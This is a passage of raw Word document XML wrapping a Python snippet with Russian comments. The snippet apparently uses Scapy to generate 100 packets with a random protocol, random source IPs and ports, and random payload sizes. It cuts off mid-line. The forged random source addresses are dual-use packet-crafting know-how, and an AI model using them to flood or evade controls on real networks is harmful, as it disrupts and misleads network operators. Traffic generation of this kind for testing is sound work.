    <w:p w14:paraId="62D66FE1" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="005F1B9E" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packets</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578EED31" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="005F1B9E" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Генерация</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>пакетов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212E6491" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Случайный выбор типа пакета (UDP, TCP, ICMP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD4DA82" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>choice</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>([UDP, TCP, ICMP])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF59CE" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B536F6" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Генерация случайных параметров</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530A5069" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RandIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>()  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Случайный исходный IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBBAC34" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RandShort</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>()  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Случайный исходный порт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CA1B7C" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>payload_size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>randint</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
